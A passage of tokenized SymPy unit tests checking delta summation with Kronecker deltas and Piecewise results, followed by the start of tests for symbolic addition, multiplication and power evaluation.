i + j ) * KD ( i , j ) , ( j , - oo , oo ) ) == <NUM_LIT:2> * i <EOL> def test_deltasummation_basic_symbolic ( ) : <EOL> assert ds ( KD ( i , j ) , ( j , <NUM_LIT:1> , <NUM_LIT:3> ) ) == Piecewise ( ( <NUM_LIT:1> , And ( S ( <NUM_LIT:1> ) <= i , i <= <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) <EOL> assert ds ( KD ( i , j ) , ( j , <NUM_LIT:1> , <NUM_LIT:1> ) ) == Piecewise ( ( <NUM_LIT:1> , Eq ( i , <NUM_LIT:1> ) ) , ( <NUM_LIT:0> , True ) ) <EOL> assert ds ( KD ( i , j ) , ( j , <NUM_LIT:2> , <NUM_LIT:2> ) ) == Piecewise ( ( <NUM_LIT:1> , Eq ( i , <NUM_LIT:2> ) ) , ( <NUM_LIT:0> , True ) ) <EOL> assert ds ( KD ( i , j ) , ( j , <NUM_LIT:3> , <NUM_LIT:3> ) ) == Piecewise ( ( <NUM_LIT:1> , Eq ( i , <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) <EOL> assert ds ( KD ( i , j ) , ( j , <NUM_LIT:1> , k ) ) == Piecewise ( ( <NUM_LIT:1> , And ( S ( <NUM_LIT:1> ) <= i , i <= k ) ) , ( <NUM_LIT:0> , True ) ) <EOL> assert ds ( KD ( i , j ) , ( j , k , <NUM_LIT:3> ) ) == Piecewise ( ( <NUM_LIT:1> , And ( k <= i , i <= <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) <EOL> assert ds ( KD ( i , j ) , ( j , k , l ) ) == Piecewise ( ( <NUM_LIT:1> , And ( k <= i , i <= l ) ) , ( <NUM_LIT:0> , True ) ) <EOL> def test_deltasummation_mul_x_kd ( ) : <EOL> assert ds ( x * KD ( i , j ) , ( j , <NUM_LIT:1> , <NUM_LIT:3> ) ) == Piecewise ( ( x , And ( S ( <NUM_LIT:1> ) <= i , i <= <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) <EOL> assert ds ( x * KD ( i , j ) , ( j , <NUM_LIT:1> , <NUM_LIT:1> ) ) == Piecewise ( ( x , Eq ( i , <NUM_LIT:1> ) ) , ( <NUM_LIT:0> , True ) ) <EOL> assert ds ( x * KD ( i , j ) , ( j , <NUM_LIT:2> , <NUM_LIT:2> ) ) == Piecewise ( ( x , Eq ( i , <NUM_LIT:2> ) ) , ( <NUM_LIT:0> , True ) ) <EOL> assert ds ( x * KD ( i , j ) , ( j , <NUM_LIT:3> , <NUM_LIT:3> ) ) == Piecewise ( ( x , Eq ( i , <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) <EOL> assert ds ( x * KD ( i , j ) , ( j , <NUM_LIT:1> , k ) ) == Piecewise ( ( x , And ( S ( <NUM_LIT:1> ) <= i , i <= k ) ) , ( <NUM_LIT:0> , True ) ) <EOL> assert ds ( x * KD ( i , j ) , ( j , k , <NUM_LIT:3> ) ) == Piecewise ( ( x , And ( k <= i , i <= <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) <EOL> assert ds ( x * KD ( i , j ) , ( j , k , l ) ) == Piecewise ( ( x , And ( k <= i , i <= l ) ) , ( <NUM_LIT:0> , True ) ) <EOL> def test_deltasummation_mul_add_x_y_kd ( ) : <EOL> assert ds ( ( x + y ) * KD ( i , j ) , ( j , <NUM_LIT:1> , <NUM_LIT:3> ) ) == Piecewise ( ( x + y , And ( S ( <NUM_LIT:1> ) <= i , i <= <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) <EOL> assert ds ( ( x + y ) * KD ( i , j ) , ( j , <NUM_LIT:1> , <NUM_LIT:1> ) ) == Piecewise ( ( x + y , Eq ( i , <NUM_LIT:1> ) ) , ( <NUM_LIT:0> , True ) ) <EOL> assert ds ( ( x + y ) * KD ( i , j ) , ( j , <NUM_LIT:2> , <NUM_LIT:2> ) ) == Piecewise ( ( x + y , Eq ( i , <NUM_LIT:2> ) ) , ( <NUM_LIT:0> , True ) ) <EOL> assert ds ( ( x + y ) * KD ( i , j ) , ( j , <NUM_LIT:3> , <NUM_LIT:3> ) ) == Piecewise ( ( x + y , Eq ( i , <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) <EOL> assert ds ( ( x + y ) * KD ( i , j ) , ( j , <NUM_LIT:1> , k ) ) == Piecewise ( ( x + y , And ( S ( <NUM_LIT:1> ) <= i , i <= k ) ) , ( <NUM_LIT:0> , True ) ) <EOL> assert ds ( ( x + y ) * KD ( i , j ) , ( j , k , <NUM_LIT:3> ) ) == Piecewise ( ( x + y , And ( k <= i , i <= <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) <EOL> assert ds ( ( x + y ) * KD ( i , j ) , ( j , k , l ) ) == Piecewise ( ( x + y , And ( k <= i , i <= l ) ) , ( <NUM_LIT:0> , True ) ) <EOL> def test_deltasummation_add_kd_kd ( ) : <EOL> assert ds ( KD ( i , k ) + KD ( j , k ) , ( k , <NUM_LIT:1> , <NUM_LIT:3> ) ) == piecewise_fold ( <EOL> Piecewise ( ( <NUM_LIT:1> , And ( S ( <NUM_LIT:1> ) <= i , i <= <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> Piecewise ( ( <NUM_LIT:1> , And ( S ( <NUM_LIT:1> ) <= j , j <= <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) ) <EOL> assert ds ( KD ( i , k ) + KD ( j , k ) , ( k , <NUM_LIT:1> , <NUM_LIT:1> ) ) == piecewise_fold ( <EOL> Piecewise ( ( <NUM_LIT:1> , Eq ( i , <NUM_LIT:1> ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> Piecewise ( ( <NUM_LIT:1> , Eq ( j , <NUM_LIT:1> ) ) , ( <NUM_LIT:0> , True ) ) ) <EOL> assert ds ( KD ( i , k ) + KD ( j , k ) , ( k , <NUM_LIT:2> , <NUM_LIT:2> ) ) == piecewise_fold ( <EOL> Piecewise ( ( <NUM_LIT:1> , Eq ( i , <NUM_LIT:2> ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> Piecewise ( ( <NUM_LIT:1> , Eq ( j , <NUM_LIT:2> ) ) , ( <NUM_LIT:0> , True ) ) ) <EOL> assert ds ( KD ( i , k ) + KD ( j , k ) , ( k , <NUM_LIT:3> , <NUM_LIT:3> ) ) == piecewise_fold ( <EOL> Piecewise ( ( <NUM_LIT:1> , Eq ( i , <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> Piecewise ( ( <NUM_LIT:1> , Eq ( j , <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) ) <EOL> assert ds ( KD ( i , k ) + KD ( j , k ) , ( k , <NUM_LIT:1> , l ) ) == piecewise_fold ( <EOL> Piecewise ( ( <NUM_LIT:1> , And ( S ( <NUM_LIT:1> ) <= i , i <= l ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> Piecewise ( ( <NUM_LIT:1> , And ( S ( <NUM_LIT:1> ) <= j , j <= l ) ) , ( <NUM_LIT:0> , True ) ) ) <EOL> assert ds ( KD ( i , k ) + KD ( j , k ) , ( k , l , <NUM_LIT:3> ) ) == piecewise_fold ( <EOL> Piecewise ( ( <NUM_LIT:1> , And ( l <= i , i <= <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> Piecewise ( ( <NUM_LIT:1> , And ( l <= j , j <= <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) ) <EOL> assert ds ( KD ( i , k ) + KD ( j , k ) , ( k , l , m ) ) == piecewise_fold ( <EOL> Piecewise ( ( <NUM_LIT:1> , And ( l <= i , i <= m ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> Piecewise ( ( <NUM_LIT:1> , And ( l <= j , j <= m ) ) , ( <NUM_LIT:0> , True ) ) ) <EOL> def test_deltasummation_add_mul_x_kd_kd ( ) : <EOL> assert ds ( x * KD ( i , k ) + KD ( j , k ) , ( k , <NUM_LIT:1> , <NUM_LIT:3> ) ) == piecewise_fold ( <EOL> Piecewise ( ( x , And ( S ( <NUM_LIT:1> ) <= i , i <= <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> Piecewise ( ( <NUM_LIT:1> , And ( S ( <NUM_LIT:1> ) <= j , j <= <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) ) <EOL> assert ds ( x * KD ( i , k ) + KD ( j , k ) , ( k , <NUM_LIT:1> , <NUM_LIT:1> ) ) == piecewise_fold ( <EOL> Piecewise ( ( x , Eq ( i , <NUM_LIT:1> ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> Piecewise ( ( <NUM_LIT:1> , Eq ( j , <NUM_LIT:1> ) ) , ( <NUM_LIT:0> , True ) ) ) <EOL> assert ds ( x * KD ( i , k ) + KD ( j , k ) , ( k , <NUM_LIT:2> , <NUM_LIT:2> ) ) == piecewise_fold ( <EOL> Piecewise ( ( x , Eq ( i , <NUM_LIT:2> ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> Piecewise ( ( <NUM_LIT:1> , Eq ( j , <NUM_LIT:2> ) ) , ( <NUM_LIT:0> , True ) ) ) <EOL> assert ds ( x * KD ( i , k ) + KD ( j , k ) , ( k , <NUM_LIT:3> , <NUM_LIT:3> ) ) == piecewise_fold ( <EOL> Piecewise ( ( x , Eq ( i , <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> Piecewise ( ( <NUM_LIT:1> , Eq ( j , <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) ) <EOL> assert ds ( x * KD ( i , k ) + KD ( j , k ) , ( k , <NUM_LIT:1> , l ) ) == piecewise_fold ( <EOL> Piecewise ( ( x , And ( S ( <NUM_LIT:1> ) <= i , i <= l ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> Piecewise ( ( <NUM_LIT:1> , And ( S ( <NUM_LIT:1> ) <= j , j <= l ) ) , ( <NUM_LIT:0> , True ) ) ) <EOL> assert ds ( x * KD ( i , k ) + KD ( j , k ) , ( k , l , <NUM_LIT:3> ) ) == piecewise_fold ( <EOL> Piecewise ( ( x , And ( l <= i , i <= <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> Piecewise ( ( <NUM_LIT:1> , And ( l <= j , j <= <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) ) <EOL> assert ds ( x * KD ( i , k ) + KD ( j , k ) , ( k , l , m ) ) == piecewise_fold ( <EOL> Piecewise ( ( x , And ( l <= i , i <= m ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> Piecewise ( ( <NUM_LIT:1> , And ( l <= j , j <= m ) ) , ( <NUM_LIT:0> , True ) ) ) <EOL> def test_deltasummation_mul_x_add_kd_kd ( ) : <EOL> assert ds ( x * ( KD ( i , k ) + KD ( j , k ) ) , ( k , <NUM_LIT:1> , <NUM_LIT:3> ) ) == piecewise_fold ( <EOL> Piecewise ( ( x , And ( S ( <NUM_LIT:1> ) <= i , i <= <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> Piecewise ( ( x , And ( S ( <NUM_LIT:1> ) <= j , j <= <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) ) <EOL> assert ds ( x * ( KD ( i , k ) + KD ( j , k ) ) , ( k , <NUM_LIT:1> , <NUM_LIT:1> ) ) == piecewise_fold ( <EOL> Piecewise ( ( x , Eq ( i , <NUM_LIT:1> ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> Piecewise ( ( x , Eq ( j , <NUM_LIT:1> ) ) , ( <NUM_LIT:0> , True ) ) ) <EOL> assert ds ( x * ( KD ( i , k ) + KD ( j , k ) ) , ( k , <NUM_LIT:2> , <NUM_LIT:2> ) ) == piecewise_fold ( <EOL> Piecewise ( ( x , Eq ( i , <NUM_LIT:2> ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> Piecewise ( ( x , Eq ( j , <NUM_LIT:2> ) ) , ( <NUM_LIT:0> , True ) ) ) <EOL> assert ds ( x * ( KD ( i , k ) + KD ( j , k ) ) , ( k , <NUM_LIT:3> , <NUM_LIT:3> ) ) == piecewise_fold ( <EOL> Piecewise ( ( x , Eq ( i , <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> Piecewise ( ( x , Eq ( j , <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) ) <EOL> assert ds ( x * ( KD ( i , k ) + KD ( j , k ) ) , ( k , <NUM_LIT:1> , l ) ) == piecewise_fold ( <EOL> Piecewise ( ( x , And ( S ( <NUM_LIT:1> ) <= i , i <= l ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> Piecewise ( ( x , And ( S ( <NUM_LIT:1> ) <= j , j <= l ) ) , ( <NUM_LIT:0> , True ) ) ) <EOL> assert ds ( x * ( KD ( i , k ) + KD ( j , k ) ) , ( k , l , <NUM_LIT:3> ) ) == piecewise_fold ( <EOL> Piecewise ( ( x , And ( l <= i , i <= <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> Piecewise ( ( x , And ( l <= j , j <= <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) ) <EOL> assert ds ( x * ( KD ( i , k ) + KD ( j , k ) ) , ( k , l , m ) ) == piecewise_fold ( <EOL> Piecewise ( ( x , And ( l <= i , i <= m ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> Piecewise ( ( x , And ( l <= j , j <= m ) ) , ( <NUM_LIT:0> , True ) ) ) <EOL> def test_deltasummation_mul_add_x_y_add_kd_kd ( ) : <EOL> assert ds ( ( x + y ) * ( KD ( i , k ) + KD ( j , k ) ) , ( k , <NUM_LIT:1> , <NUM_LIT:3> ) ) == piecewise_fold ( <EOL> Piecewise ( ( x + y , And ( S ( <NUM_LIT:1> ) <= i , i <= <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> Piecewise ( ( x + y , And ( S ( <NUM_LIT:1> ) <= j , j <= <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) ) <EOL> assert ds ( ( x + y ) * ( KD ( i , k ) + KD ( j , k ) ) , ( k , <NUM_LIT:1> , <NUM_LIT:1> ) ) == piecewise_fold ( <EOL> Piecewise ( ( x + y , Eq ( i , <NUM_LIT:1> ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> Piecewise ( ( x + y , Eq ( j , <NUM_LIT:1> ) ) , ( <NUM_LIT:0> , True ) ) ) <EOL> assert ds ( ( x + y ) * ( KD ( i , k ) + KD ( j , k ) ) , ( k , <NUM_LIT:2> , <NUM_LIT:2> ) ) == piecewise_fold ( <EOL> Piecewise ( ( x + y , Eq ( i , <NUM_LIT:2> ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> Piecewise ( ( x + y , Eq ( j , <NUM_LIT:2> ) ) , ( <NUM_LIT:0> , True ) ) ) <EOL> assert ds ( ( x + y ) * ( KD ( i , k ) + KD ( j , k ) ) , ( k , <NUM_LIT:3> , <NUM_LIT:3> ) ) == piecewise_fold ( <EOL> Piecewise ( ( x + y , Eq ( i , <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> Piecewise ( ( x + y , Eq ( j , <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) ) <EOL> assert ds ( ( x + y ) * ( KD ( i , k ) + KD ( j , k ) ) , ( k , <NUM_LIT:1> , l ) ) == piecewise_fold ( <EOL> Piecewise ( ( x + y , And ( S ( <NUM_LIT:1> ) <= i , i <= l ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> Piecewise ( ( x + y , And ( S ( <NUM_LIT:1> ) <= j , j <= l ) ) , ( <NUM_LIT:0> , True ) ) ) <EOL> assert ds ( ( x + y ) * ( KD ( i , k ) + KD ( j , k ) ) , ( k , l , <NUM_LIT:3> ) ) == piecewise_fold ( <EOL> Piecewise ( ( x + y , And ( l <= i , i <= <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> Piecewise ( ( x + y , And ( l <= j , j <= <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) ) <EOL> assert ds ( ( x + y ) * ( KD ( i , k ) + KD ( j , k ) ) , ( k , l , m ) ) == piecewise_fold ( <EOL> Piecewise ( ( x + y , And ( l <= i , i <= m ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> Piecewise ( ( x + y , And ( l <= j , j <= m ) ) , ( <NUM_LIT:0> , True ) ) ) <EOL> def test_deltasummation_add_mul_x_y_mul_x_kd ( ) : <EOL> assert ds ( x * y + x * KD ( i , j ) , ( j , <NUM_LIT:1> , <NUM_LIT:3> ) ) == Piecewise ( ( <NUM_LIT:3> * x * y + x , And ( S ( <NUM_LIT:1> ) <= i , i <= <NUM_LIT:3> ) ) , ( <NUM_LIT:3> * x * y , True ) ) <EOL> assert ds ( x * y + x * KD ( i , j ) , ( j , <NUM_LIT:1> , <NUM_LIT:1> ) ) == Piecewise ( ( x * y + x , Eq ( i , <NUM_LIT:1> ) ) , ( x * y , True ) ) <EOL> assert ds ( x * y + x * KD ( i , j ) , ( j , <NUM_LIT:2> , <NUM_LIT:2> ) ) == Piecewise ( ( x * y + x , Eq ( i , <NUM_LIT:2> ) ) , ( x * y , True ) ) <EOL> assert ds ( x * y + x * KD ( i , j ) , ( j , <NUM_LIT:3> , <NUM_LIT:3> ) ) == Piecewise ( ( x * y + x , Eq ( i , <NUM_LIT:3> ) ) , ( x * y , True ) ) <EOL> assert ds ( x * y + x * KD ( i , j ) , ( j , <NUM_LIT:1> , k ) ) == Piecewise ( ( k * x * y + x , And ( S ( <NUM_LIT:1> ) <= i , i <= k ) ) , ( k * x * y , True ) ) <EOL> assert ds ( x * y + x * KD ( i , j ) , ( j , k , <NUM_LIT:3> ) ) == Piecewise ( ( ( <NUM_LIT:4> - k ) * x * y + x , And ( k <= i , i <= <NUM_LIT:3> ) ) , ( ( <NUM_LIT:4> - k ) * x * y , True ) ) <EOL> assert ds ( x * y + x * KD ( i , j ) , ( j , k , l ) ) == Piecewise ( <EOL> ( ( l - k + <NUM_LIT:1> ) * x * y + x , And ( k <= i , i <= l ) ) , ( ( l - k + <NUM_LIT:1> ) * x * y , True ) ) <EOL> def test_deltasummation_mul_x_add_y_kd ( ) : <EOL> assert ds ( x * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:1> , <NUM_LIT:3> ) ) == Piecewise ( ( <NUM_LIT:3> * x * y + x , And ( S ( <NUM_LIT:1> ) <= i , i <= <NUM_LIT:3> ) ) , ( <NUM_LIT:3> * x * y , True ) ) <EOL> assert ds ( x * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:1> , <NUM_LIT:1> ) ) == Piecewise ( ( x * y + x , Eq ( i , <NUM_LIT:1> ) ) , ( x * y , True ) ) <EOL> assert ds ( x * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:2> , <NUM_LIT:2> ) ) == Piecewise ( ( x * y + x , Eq ( i , <NUM_LIT:2> ) ) , ( x * y , True ) ) <EOL> assert ds ( x * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:3> , <NUM_LIT:3> ) ) == Piecewise ( ( x * y + x , Eq ( i , <NUM_LIT:3> ) ) , ( x * y , True ) ) <EOL> assert ds ( x * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:1> , k ) ) == Piecewise ( ( k * x * y + x , And ( S ( <NUM_LIT:1> ) <= i , i <= k ) ) , ( k * x * y , True ) ) <EOL> assert ds ( x * ( y + KD ( i , j ) ) , ( j , k , <NUM_LIT:3> ) ) == Piecewise ( ( ( <NUM_LIT:4> - k ) * x * y + x , And ( k <= i , i <= <NUM_LIT:3> ) ) , ( ( <NUM_LIT:4> - k ) * x * y , True ) ) <EOL> assert ds ( x * ( y + KD ( i , j ) ) , ( j , k , l ) ) == Piecewise ( <EOL> ( ( l - k + <NUM_LIT:1> ) * x * y + x , And ( k <= i , i <= l ) ) , ( ( l - k + <NUM_LIT:1> ) * x * y , True ) ) <EOL> def test_deltasummation_mul_x_add_y_twokd ( ) : <EOL> assert ds ( x * ( y + <NUM_LIT:2> * KD ( i , j ) ) , ( j , <NUM_LIT:1> , <NUM_LIT:3> ) ) == Piecewise ( ( <NUM_LIT:3> * x * y + <NUM_LIT:2> * x , And ( S ( <NUM_LIT:1> ) <= i , i <= <NUM_LIT:3> ) ) , ( <NUM_LIT:3> * x * y , True ) ) <EOL> assert ds ( x * ( y + <NUM_LIT:2> * KD ( i , j ) ) , ( j , <NUM_LIT:1> , <NUM_LIT:1> ) ) == Piecewise ( ( x * y + <NUM_LIT:2> * x , Eq ( i , <NUM_LIT:1> ) ) , ( x * y , True ) ) <EOL> assert ds ( x * ( y + <NUM_LIT:2> * KD ( i , j ) ) , ( j , <NUM_LIT:2> , <NUM_LIT:2> ) ) == Piecewise ( ( x * y + <NUM_LIT:2> * x , Eq ( i , <NUM_LIT:2> ) ) , ( x * y , True ) ) <EOL> assert ds ( x * ( y + <NUM_LIT:2> * KD ( i , j ) ) , ( j , <NUM_LIT:3> , <NUM_LIT:3> ) ) == Piecewise ( ( x * y + <NUM_LIT:2> * x , Eq ( i , <NUM_LIT:3> ) ) , ( x * y , True ) ) <EOL> assert ds ( x * ( y + <NUM_LIT:2> * KD ( i , j ) ) , ( j , <NUM_LIT:1> , k ) ) == Piecewise ( ( k * x * y + <NUM_LIT:2> * x , And ( S ( <NUM_LIT:1> ) <= i , i <= k ) ) , ( k * x * y , True ) ) <EOL> assert ds ( x * ( y + <NUM_LIT:2> * KD ( i , j ) ) , ( j , k , <NUM_LIT:3> ) ) == Piecewise ( <EOL> ( ( <NUM_LIT:4> - k ) * x * y + <NUM_LIT:2> * x , And ( k <= i , i <= <NUM_LIT:3> ) ) , ( ( <NUM_LIT:4> - k ) * x * y , True ) ) <EOL> assert ds ( x * ( y + <NUM_LIT:2> * KD ( i , j ) ) , ( j , k , l ) ) == Piecewise ( <EOL> ( ( l - k + <NUM_LIT:1> ) * x * y + <NUM_LIT:2> * x , And ( k <= i , i <= l ) ) , ( ( l - k + <NUM_LIT:1> ) * x * y , True ) ) <EOL> def test_deltasummation_mul_add_x_y_add_y_kd ( ) : <EOL> assert ds ( ( x + y ) * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:1> , <NUM_LIT:3> ) ) == Piecewise ( <EOL> ( <NUM_LIT:3> * ( x + y ) * y + x + y , And ( S ( <NUM_LIT:1> ) <= i , i <= <NUM_LIT:3> ) ) , ( <NUM_LIT:3> * ( x + y ) * y , True ) ) <EOL> assert ds ( ( x + y ) * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:1> , <NUM_LIT:1> ) ) == Piecewise ( ( ( x + y ) * y + x + y , Eq ( i , <NUM_LIT:1> ) ) , ( ( x + y ) * y , True ) ) <EOL> assert ds ( ( x + y ) * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:2> , <NUM_LIT:2> ) ) == Piecewise ( ( ( x + y ) * y + x + y , Eq ( i , <NUM_LIT:2> ) ) , ( ( x + y ) * y , True ) ) <EOL> assert ds ( ( x + y ) * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:3> , <NUM_LIT:3> ) ) == Piecewise ( ( ( x + y ) * y + x + y , Eq ( i , <NUM_LIT:3> ) ) , ( ( x + y ) * y , True ) ) <EOL> assert ds ( ( x + y ) * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:1> , k ) ) == Piecewise ( <EOL> ( k * ( x + y ) * y + x + y , And ( S ( <NUM_LIT:1> ) <= i , i <= k ) ) , ( k * ( x + y ) * y , True ) ) <EOL> assert ds ( ( x + y ) * ( y + KD ( i , j ) ) , ( j , k , <NUM_LIT:3> ) ) == Piecewise ( <EOL> ( ( <NUM_LIT:4> - k ) * ( x + y ) * y + x + y , And ( k <= i , i <= <NUM_LIT:3> ) ) , <EOL> ( ( <NUM_LIT:4> - k ) * ( x + y ) * y , True ) ) <EOL> assert ds ( ( x + y ) * ( y + KD ( i , j ) ) , ( j , k , l ) ) == Piecewise ( <EOL> ( ( l - k + <NUM_LIT:1> ) * ( x + y ) * y + x + y , And ( k <= i , i <= l ) ) , <EOL> ( ( l - k + <NUM_LIT:1> ) * ( x + y ) * y , True ) ) <EOL> def test_deltasummation_mul_add_x_kd_add_y_kd ( ) : <EOL> assert ds ( ( x + KD ( i , k ) ) * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:1> , <NUM_LIT:3> ) ) == piecewise_fold ( <EOL> Piecewise ( ( KD ( i , k ) + x , And ( S ( <NUM_LIT:1> ) <= i , i <= <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> <NUM_LIT:3> * ( KD ( i , k ) + x ) * y ) <EOL> assert ds ( ( x + KD ( i , k ) ) * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:1> , <NUM_LIT:1> ) ) == piecewise_fold ( <EOL> Piecewise ( ( KD ( i , k ) + x , Eq ( i , <NUM_LIT:1> ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> ( KD ( i , k ) + x ) * y ) <EOL> assert ds ( ( x + KD ( i , k ) ) * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:2> , <NUM_LIT:2> ) ) == piecewise_fold ( <EOL> Piecewise ( ( KD ( i , k ) + x , Eq ( i , <NUM_LIT:2> ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> ( KD ( i , k ) + x ) * y ) <EOL> assert ds ( ( x + KD ( i , k ) ) * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:3> , <NUM_LIT:3> ) ) == piecewise_fold ( <EOL> Piecewise ( ( KD ( i , k ) + x , Eq ( i , <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> ( KD ( i , k ) + x ) * y ) <EOL> assert ds ( ( x + KD ( i , k ) ) * ( y + KD ( i , j ) ) , ( j , <NUM_LIT:1> , k ) ) == piecewise_fold ( <EOL> Piecewise ( ( KD ( i , k ) + x , And ( S ( <NUM_LIT:1> ) <= i , i <= k ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> k * ( KD ( i , k ) + x ) * y ) <EOL> assert ds ( ( x + KD ( i , k ) ) * ( y + KD ( i , j ) ) , ( j , k , <NUM_LIT:3> ) ) == piecewise_fold ( <EOL> Piecewise ( ( KD ( i , k ) + x , And ( k <= i , i <= <NUM_LIT:3> ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> ( <NUM_LIT:4> - k ) * ( KD ( i , k ) + x ) * y ) <EOL> assert ds ( ( x + KD ( i , k ) ) * ( y + KD ( i , j ) ) , ( j , k , l ) ) == piecewise_fold ( <EOL> Piecewise ( ( KD ( i , k ) + x , And ( k <= i , i <= l ) ) , ( <NUM_LIT:0> , True ) ) + <EOL> ( l - k + <NUM_LIT:1> ) * ( KD ( i , k ) + x ) * y ) </s>
<s> from sympy import Symbol , Function , exp , sqrt , Rational , I , cos , tan <EOL> from sympy . utilities . pytest import XFAIL <EOL> def test_add_eval ( ) : <EOL> a = Symbol ( "<STR_LIT:a>" ) <EOL> b = Symbol ( "<STR_LIT:b>" ) <EOL> c = Rational ( <NUM_LIT:1> ) <EOL> p = Rational ( <NUM_LIT:5> ) <EOL> assert a * b + c + p == a * b + <NUM_LIT:6> <EOL> assert c + a + p == a + <NUM_LIT:6> <EOL> assert c + a - p == a + ( - <NUM_LIT:4> ) <EOL> assert a + a == <NUM_LIT:2> * a <EOL> assert a + p + a == <NUM_LIT:2> * a + <NUM_LIT:5> <EOL> assert c + p == Rational ( <NUM_LIT:6> ) <EOL> assert b + a - b == a <EOL> def test_addmul_eval ( ) : <EOL> a = Symbol ( "<STR_LIT:a>" ) <EOL> b = Symbol ( "<STR_LIT:b>" ) <EOL> c = Rational ( <NUM_LIT:1> ) <EOL> p = Rational ( <NUM_LIT:5> ) <EOL> assert c + a + b * c + a - p == <NUM_LIT:2> * a + b + ( - <NUM_LIT:4> ) <EOL> assert a * <NUM_LIT:2> + p + a == a * <NUM_LIT:2> + <NUM_LIT:5> + a <EOL> assert a * <NUM_LIT:2> + p + a == <NUM_LIT:3> * a + <NUM_LIT:5> <EOL> assert a * <NUM_LIT:2> + a == <NUM_LIT:3> * a <EOL> def test_pow_eval ( ) : <EOL> assert sqrt ( - <NUM_LIT:1> ) == I <EOL> assert sqrt ( - <NUM_LIT:4> ) == <NUM_LIT:2> * I <EOL> assert sqrt ( <NUM_LIT:4> ) == <NUM_LIT:2> <EOL> assert ( <NUM_LIT:8> ) ** Rational ( <NUM_LIT:1> , <NUM_LIT:3> ) == <NUM_LIT:2> <EOL> assert ( - <NUM_LIT:8> ) ** Rational ( <NUM_LIT:1> , <NUM_LIT:3> ) == <NUM_LIT:2> * ( ( - <NUM_LIT:1> ) ** Rational ( <NUM_LIT:1> , <NUM_LIT:3> ) ) <EOL> assert sqrt ( - <NUM_LIT:2> ) == I * sqrt ( <NUM_LIT:2> ) <EOL> assert ( - <NUM_LIT:1> ) ** Rational ( <NUM_LIT:1> , <NUM_LIT:3> ) != I <EOL> assert ( - <NUM_LIT:10> ) ** Rational ( <NUM_LIT:1> , <NUM_LIT:3> ) != I * ( ( <NUM_LIT:10> ) ** Rational ( <NUM_LIT:1> , <NUM_LIT:3> ) ) <EOL> assert ( - <NUM_LIT:2> ) ** Rational ( <NUM_LIT:1> , <NUM_LIT:4> ) != ( <NUM_LIT:2> ) ** Rational ( <NUM_LIT:1> , <NUM_LIT:4> ) <EOL> assert <NUM_LIT:64> ** Rational ( <NUM_LIT:1> , <NUM_LIT:3> ) == <NUM_LIT:4> <EOL> assert <NUM_LIT:64> ** Rational ( 